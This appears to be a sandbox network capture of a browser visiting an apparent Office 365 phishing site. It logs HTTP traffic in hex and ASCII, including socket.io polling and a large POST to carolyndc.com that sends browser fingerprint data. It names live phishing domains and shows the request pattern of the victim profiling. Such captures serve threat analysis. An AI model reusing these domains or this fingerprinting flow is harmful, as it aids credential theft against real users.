2024-11-07 20:05:05 UTC	811	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cache-control: no-store cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZuVyol36U3wiB79QoeQVQUh04FQmp8nNHQhrGo4OwzkugituZlSWfSodNXKR2fMBD80%2FEYJNlbq7uhJGS6RAxTt%2B0xNuad5hi%2BQfCCLfSTCHz%2FDUaJeKBWx2SvkDLo8d%2Fx8iD59C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defefa2ea4f03ed-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1341&delivery_rate=1802115&cwnd=236&unsent_bytes=0&cid=23abefc5b40d2bce&ts=155&x=0"
2024-11-07 20:05:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-07 20:05:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:06 UTC	412	OUT	GET /socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:24 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:24 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close Access-Control-Allow-Origin: * cache-control: no-store cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYGbNQ3Wv0nhEgbbLrVCmuyVAYEDLT%2Fqh06hKjV4HDNjbLaDblyD7XgCSPOWlb867bl63HzAG1%2BJfYrU4UdsltpOiA8ZJhTRgECraC4ZPAIIaR3XDgcISg6O6WJjPYKBEcH5964q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defefabcdb44859-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1953&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=990&delivery_rate=1511482&cwnd=244&unsent_bytes=0&cid=b39185dba25233a7&ts=18119&x=0"
2024-11-07 20:05:24 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:25 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1xe5ulvNlDKvPlK&MD=7mbNbYNh HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 20:05:25 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 3a63fcdf-4d9f-4b6d-9752-895d8c7859a0 MS-RequestId: 847929bf-3f3c-4d8a-86b8-5252c6a3ce2a MS-CV: oKxYeerXYUWFk13t.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 20:05:24 GMT Connection: close Content-Length: 30005
2024-11-07 20:05:25 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-07 20:05:25 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:25 UTC	1021	OUT	POST /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1 Host: carolyndc.com Connection: keep-alive Content-Length: 138992 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://carolyndc.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65 Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c Data Ascii: %22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefaultControll
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74 72 79 25 32 32 25 Data Ascii: 2function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverEntry%22%
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 Data Ascii: %22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22H
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 32 25 33 41 25 32 32 66 Data Ascii: nal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%22%3A%22f
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 Data Ascii: sferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnative+code
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d 65 6e 74 41 75 64 69 6f Data Ascii: treamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElementAudio
2024-11-07 20:05:25 UTC	16384	OUT	Data Raw: 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61 74 69 6f 6e 25 32 32 25 Data Ascii: atechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistration%22%
2024-11-07 20:05:25 UTC	7920	OUT	Data Raw: 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 25 32 32 25 33 Data Ascii: omment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElementNS%22%3
2024-11-07 20:05:26 UTC	208	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 20:05:26 UTC	378	IN	Data Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 42 4e 56 45 45 31 59 30 52 4a 4d 46 5a 55 52 54 42 4e 56 45 46 34 54 6b 52 56 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRTBNVEE1Y0RJMFZURTBNVEF4TkRVMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:27 UTC	400	OUT	GET /favicon.ico HTTP/1.1 Host: carolyndc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
2024-11-07 20:05:27 UTC	318	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 20:05:27 UTC	479	IN	Data Raw: 31 64 33 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 0a 20 20 20 20 20 20 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a Data Ascii: 1d3<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body>

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:40 UTC	542	OUT	OPTIONS /report/v4?s=0A2lfSh%2BQ8X8z8Xipv0ZQi7mWsXFs6AdaEsSSVQ7gWit6KaPBYsOzMx8VzUTU6pw71HQ2V0H9Sabv9TcaRv6bx9DXD3EEROCqpwyCmKPH1z3DrwLYqmC6xoNpX%2FSscmS1g3vt%2Bxg HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://drensyoons1sedt.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:40 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Thu, 07 Nov 2024 20:05:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:41 UTC	480	OUT	POST /report/v4?s=0A2lfSh%2BQ8X8z8Xipv0ZQi7mWsXFs6AdaEsSSVQ7gWit6KaPBYsOzMx8VzUTU6pw71HQ2V0H9Sabv9TcaRv6bx9DXD3EEROCqpwyCmKPH1z3DrwLYqmC6xoNpX%2FSscmS1g3vt%2Bxg HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 966 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:41 UTC	966	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 31 33 38 38 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 50 4f 53 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 61 72 6f 6c 79 6e 64 63 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 Data Ascii: [{"age":13885,"body":{"elapsed_time":828,"method":"POST","phase":"application","protocol":"http/1.1","referrer":"https://carolyndc.com/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":400,"type":"http.error"},"type":"network-error","url"
2024-11-07 20:05:41 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Thu, 07 Nov 2024 20:05:41 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close